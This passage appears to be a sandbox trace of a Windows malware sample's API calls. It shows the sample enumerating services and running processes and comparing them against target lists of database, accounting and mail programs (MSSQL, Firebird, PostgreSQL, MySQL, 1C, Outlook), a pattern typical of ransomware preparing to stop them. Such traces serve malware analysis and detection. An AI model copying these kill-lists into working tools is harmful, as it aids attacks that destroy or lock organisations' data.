lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.443] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.443] lstrlenW (lpString="lmhosts") returned 7 [0054.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.443] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.443] lstrlenW (lpString="MMCSS") returned 5 [0054.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.443] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.443] lstrlenW (lpString="MpsSvc") returned 6 [0054.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.443] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.444] lstrlenW (lpString="Netman") returned 6 [0054.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.444] lstrlenW (lpString="netprofm") returned 8 [0054.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.444] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.444] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.444] lstrlenW (lpString="NlaSvc") returned 6 [0054.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.444] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.444] lstrlenW (lpString="nsi") returned 3 [0054.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.444] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.444] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.444] lstrlenW (lpString="PcaSvc") returned 6 [0054.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.444] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.444] lstrlenW (lpString="PlugPlay") returned 8 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.445] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.445] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.445] lstrlenW (lpString="Power") returned 5 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.445] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.445] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.445] lstrlenW (lpString="ProfSvc") returned 7 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.445] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.445] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.445] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.445] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.445] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.445] lstrlenW (lpString="RpcSs") returned 5 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.445] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.445] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.445] lstrlenW (lpString="SamSs") returned 5 [0054.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.446] lstrlenW (lpString="Schedule") returned 8 [0054.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.446] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.446] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.446] lstrlenW (lpString="SENS") returned 4 [0054.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.446] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.446] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.446] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.446] lstrlenW (lpString="Spooler") returned 7 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.447] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.447] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.447] lstrlenW (lpString="swprv") returned 5 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.447] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.447] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.447] lstrlenW (lpString="SysMain") returned 7 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.447] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.447] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.447] lstrlenW (lpString="Themes") returned 6 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.447] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.447] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.447] lstrlenW (lpString="TrkWks") returned 6 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.447] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.447] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.447] lstrlenW (lpString="UxSms") returned 5 [0054.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.448] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.448] lstrlenW (lpString="VSS") returned 3 [0054.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.448] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.448] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.448] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.448] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.448] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.448] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.448] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.448] lstrlenW (lpString="Winmgmt") returned 7 [0054.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.448] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.449] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.449] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.449] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.449] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0054.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e8 [0054.452] Process32FirstW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.452] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.453] lstrlenW (lpString="System") returned 6 [0054.453] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.453] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.453] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.454] lstrlenW (lpString="smss.exe") returned 8 [0054.454] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.454] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.454] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.455] lstrlenW (lpString="csrss.exe") returned 9 [0054.455] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.455] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.455] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.455] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.455] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.455] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.455] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.455] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.456] lstrlenW (lpString="wininit.exe") returned 11 [0054.456] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.456] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.456] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.456] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.457] lstrlenW (lpString="csrss.exe") returned 9 [0054.457] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.458] lstrlenW (lpString="winlogon.exe") returned 12 [0054.458] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.458] lstrlenW (lpString="services.exe") returned 12 [0054.458] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.459] lstrlenW (lpString="lsass.exe") returned 9 [0054.459] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.460] lstrlenW (lpString="lsm.exe") returned 7 [0054.460] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.461] lstrlenW (lpString="svchost.exe") returned 11 [0054.461] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.462] lstrlenW (lpString="svchost.exe") returned 11 [0054.462] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.462] lstrlenW (lpString="svchost.exe") returned 11 [0054.463] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.463] lstrlenW (lpString="svchost.exe") returned 11 [0054.463] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.464] lstrlenW (lpString="svchost.exe") returned 11 [0054.464] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.465] lstrlenW (lpString="audiodg.exe") returned 11 [0054.465] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.466] lstrlenW (lpString="svchost.exe") returned 11 [0054.466] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.466] lstrlenW (lpString="svchost.exe") returned 11 [0054.466] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.467] lstrlenW (lpString="dwm.exe") returned 7 [0054.467] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.468] lstrlenW (lpString="explorer.exe") returned 12 [0054.468] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.469] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.469] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.469] lstrlenW (lpString="taskhost.exe") returned 12 [0054.470] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.470] lstrlenW (lpString="svchost.exe") returned 11 [0054.470] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.471] lstrlenW (lpString="taskeng.exe") returned 11 [0054.471] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.472] lstrlenW (lpString="taskhost.exe") returned 12 [0054.472] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0054.473] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0054.473] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0054.473] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0054.473] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0054.474] lstrlenW (lpString="sa_shape.exe") returned 12 [0054.474] Process32NextW (in: 